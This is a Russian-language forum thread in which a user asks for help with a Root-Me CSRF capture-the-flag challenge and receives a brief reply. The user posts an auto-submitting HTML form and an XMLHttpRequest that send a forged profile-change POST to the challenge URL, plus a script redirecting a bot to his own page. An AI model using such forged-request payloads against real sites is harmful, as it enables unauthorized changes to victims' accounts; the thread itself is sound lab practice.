• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

csrf root-me не могу сам решить

G

Gruzin

в данный момент я немного оторван от цивилизации, иногда дают телефон.
решил от безделия проходить ctf на root-me
дошлел до вроде ничего сложного нет создал сайт
HTML:
<html><form action="http://challenge01.root-me.org/web-client/ch22/?action=profile" method="post" enctype="multipart/form-data">
        <div class="form-group">
        <input type="text" name="username" value="10">
        </div>
        <br>     
        <div class="form-group">
        <input type="checkbox"  name="status" checked = "true"  >
        </div>
        <br> 
        </form>
        <script>
        document.getElementsByTagName('form')[0].submit();</script>
        </html>
пытаюсь перенаправить бота на сайт
JavaScript:
<script type="text/javascript">
setTimeout('location.replace("http://xxxx.github.io")', 2);
</script>
не работает, пробовал другие способы перенаправить на страницу ничего не вышло.
пробовал отправить что-то вроде этого
JavaScript:
function csrf(){
    var data = {
        username: '10',
        status: 'true'
    };
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'http://challenge01.root-me.org/web-client/ch22/?action=profile', true);
    xhr.send(data);
}
ну это уже от отчаиния
важусь уже месяц с задачей,
буду очень рад помощи
 

InetTester

Green Team
21.10.2018
308
43
BIT
5
При получении страницы с данной формой ботом, он должен быть перенаправлен на Не уверен что просто точно понял задачу.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!